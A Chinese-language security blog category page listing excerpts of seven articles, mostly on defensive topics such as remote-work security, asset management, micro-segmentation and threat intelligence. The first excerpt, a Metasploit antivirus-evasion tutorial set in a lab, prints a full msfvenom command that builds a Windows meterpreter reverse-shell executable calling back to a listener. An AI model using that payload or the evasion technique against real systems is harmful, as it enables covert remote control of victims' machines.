分类目录:安全研究

以下是分类 安全研究 下的所有文章

Metasploit免杀初探索

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 LPORT=7777 -f exe -o t.exe 原始生成后,完全被查杀 VT查杀55/69 0x03 编码处理 这里使用msf自带的编码器进……

【抗疫专题】远程办公依靠良好安全习惯就够了吗?

受新型冠状病毒肺炎疫情的影响,多个省市出台规定宣布推迟复工时间,在家远程办公模式成为了众多单位的选择。 远程办公模式在为我们提供方便的同时,也带来了一些问题,安全性就是影响远程办公的重要因素之一。非专用的办公设备、非专用的网络环境,大规模人员的远程办公带来的安全风险成为我们急需关注和解决的……

细说资产梳理和漏洞运营里无法言喻的“难”

早几年里,企业的安全运营人员面对机房里的资产管理还能从容应对。如今,如果对资产管理的重视程度和运营方式还停留在以前的水平,迟早会成为黑客的下一个目标。 在网络安全建设的过程中,资产梳理和漏洞运营作为其中的关键环节,常常遇到诸多挑战。 由于内部信息化业务发展迅速,云资产剧增,企业内……

安全狗“云”亮相ISC2020 深入解读云工作负载安全(CWPP)

2020年8月19日,第八届互联网安全大会(ISC2020)的安全服务论坛圆满举行。 作为全球网络安全圈的最大盛会之一,ISC大会已举办过14场国际安全领袖峰会,展开超过100次的顶级安全智库对话,已成为全球性的网络安全发展趋势风向标。 安全狗作为国内最早引入云工作负载安全(CWPP)概念,并成功构建相应产品线的专业……

面对泛主机场景,如何有效搭建安全体系

近年来,随着云计算、人工智能、物联网、5G等新技术新起,企业数字化转型使业务暴露范围急剧增加,伴随着黑色产业链向专业化、规模化、智能化方向快速发展,各行各业面临着更多未知的信息安全风险。目前,国内多数用户处于“泛主机”场景,即传统主机环境+内部私有云环境+公有云环境+容器环境(根据业务情况)。笔者将这样的……

安全研究 | 细谈微隔离

网络隔离并不是新的概念,而微隔离技术(Micro-Segmentation)是VMware在应对虚拟化隔离技术时提出来的,但真正让微隔离备受大家关注是从2016年起连续3年微隔离技术都进入Gartner年度安全技术榜单开始。在2016年的Gartner安全与风险管理峰会上, Gartner副总裁、知名分析师Neil MacDonald提出了微隔离技术的概念。“……

【安全研究】浅谈威胁情报应用场景

现今网络攻防环境愈发复杂,威胁情报现在作为一种弥补攻防信息不对称的安全技术逐渐得到了广泛的认识,更多企业也开始接受并购买威胁情报数据来建设企业安全。笔者对当下的威胁情报应用较多的场景进行了一些总结,期待与业界各位权威进一步交流。 01 什么是威胁情报? 在探讨威胁情报应用的问题之前,我们必须首先……